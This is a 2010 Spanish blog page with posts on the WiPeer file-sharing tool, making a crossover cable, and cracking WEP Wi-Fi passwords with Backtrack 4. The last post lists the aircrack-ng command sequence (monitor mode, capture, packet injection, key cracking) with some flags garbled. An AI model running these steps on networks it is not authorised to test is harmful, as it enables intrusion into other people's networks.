domingo, 24 de octubre de 2010

Como conectar dos computadoras de manera inalámbrica fácilmente con WiPeer

Wi-Fi
Para aquellas personas que andan buscando una manera practica de conectar dos computadoras o laptops de manera inalámbrica, para poder compartir archivos fácilmente, o para aquellos que quieran conectar sus computadoras a una red local casera o de oficina, esto se puede hacer fácilmente y gratis con Wipeer, el cual te permite compartir archivos entre varias computadoras, también puedes jugar juegos multijugador, Chatear, y colaborar a través de redes W-Fi tanto caseras como de oficinas, como lo había mencionado anteriormente.
Una de las funcionalidades que llamo mucho mi atención acerca de WiPeer es que te permite saber cuando algunos de tus amigos de facebook se han conectado.
WiPeer esta disponible en español y puede ser instalado en los siguientes sistemas operativos Windows 7, Windows Xp y Windows Vista
Estos son algunos puntos los cuales el sitio oficial de WiPeer menciona:
Estás visitando a unos amigos y te gustaría pasarles las fotos de aquel viaje que compartisteis de tu portátil al suyo. ¿No sería genial que pudieras hacerlo directamente de un ordenador al otro?
- Estás en una clase muy aburrida. Tus amigos y tú tienes portátiles pero tu universidad no tiene instalado un punto de acceso en clase. ¿No sería genial si pudierais jugar un juego de Ajedrez o de Reversi contra ellos, o incluso comentar el partido del día anterior?
- Estas en un avión en un vuelo de gran distancia y estás buscando algo que hacer. Si pudieras simplemente jugar una partida de Chinese checkers con otros pasajeros…
- Tienes una red en casa o en una pequeña oficina y te gustaría compartir archivos entre el resto de ordenadores sin tener que configurar un servidor dedicado. Tiene que haber una forma sencilla de poder hacerlo.
- Eres nuevo en el campus y quieres hacer amigos rápidamente. Si tienes una cuenta facebook, la característica Peersonalizar de WiPeer puede ayudarte a conseguirlo.
Sitio Oficial de WiPeer
Descargar WiPeer

Como fabricar un cable de red cruzado para conectar dos computadoras

crossovercable
Para aquellos que andan aprendiendo redes, son estudiantes de Sistemas Computacionales estos les puede ayudar a los que no son estudiantes y no saben, pos también es de mucha utilidad.
Para conectar dos computadoras en red para compartir información sin tener a la mano ningún dispositivo, necesitaremos de un cable cruzado, en el siguiente diagrama podremos ver como se tienen que cruzar los cables para que funcione bien, de todos modos se pueden evitar todo este rollo y comprar un cable cruzado.
Pueden ver mas informacion acerca de configuraciones en Wndows para conectar dos computadoras con un cable cruzado en el siguiente enlace.

Como hackear una contraseña WEP en una red Wi-Fi con Backtrack 4

Aquí les dejo un video muy interesante en el cual nos explican lo fácil que es  crackear una contraseña WEP de una red Wi-Fi con el programa Backtrack
Solo tenemos que descargar Backtrack, grabarlo en un CD y bootearlo, lo demás viene explicado en el video
Los programas que necesitamos los puedes encontrar aquí
http://www.backtrack-linux.org/
http://www.imgburn.com/
Esto son los  comandos que se utilizan:
Startx
/etc/init.d/networking start
airmon-ng
airmon-ng stop [wireless card name]
airmon-ng start [wireless card name]
airmon-ng
airodump-ng [wireless card name]
ctrl c
airodump-ng w wep c [channel number] bssid [Bssid number] [wireless card name]
aireplay-ng -1 0 a [bssid] [wireless card name]
aireplay-ng -3 b [bssid][wireless card name]
ctrl + c
dir
aircrack-ng [filename]